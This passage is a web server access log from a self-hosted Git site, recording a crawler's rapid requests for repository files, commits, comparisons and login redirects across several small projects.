237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 216.73.216.188] [Length 11218] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fwebsockets" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 216.73.216.188] [Length 14317] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" [Client 216.73.216.188] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Fd4f1ca87ab7f1292db644da6b64b8d099a6c8e96%2F.TemporaryDocument" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 11103] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fpages" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 216.73.216.188] [Length 11198] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 11063] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2Fassets%2Fimages" [Client 216.73.216.188] [Length 19565] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fwatchfiles" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fpip3" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fpages" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fupdate_status.py" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fupdate_status.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2FActivate.ps1" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fpip" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcompare%2Fmain..a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fpages" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" [Client 216.73.216.188] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 453453] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 11704] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:29 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/$%7BgetInvestingUrl(symbol)%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 11236] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" [Client 216.73.216.188] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fupdate_status.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 11063] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10869] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm%2Fdata%2Fnginx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 216.73.216.188] [Length 11222] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 453564] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" [Client 216.73.216.188] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm%2Fdata%2Flogs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 216.73.216.188] [Length 10845] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" [Client 216.73.216.188] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9788] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11473] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FOpcUaMinimal.csproj.nuget.g.props" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10865] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 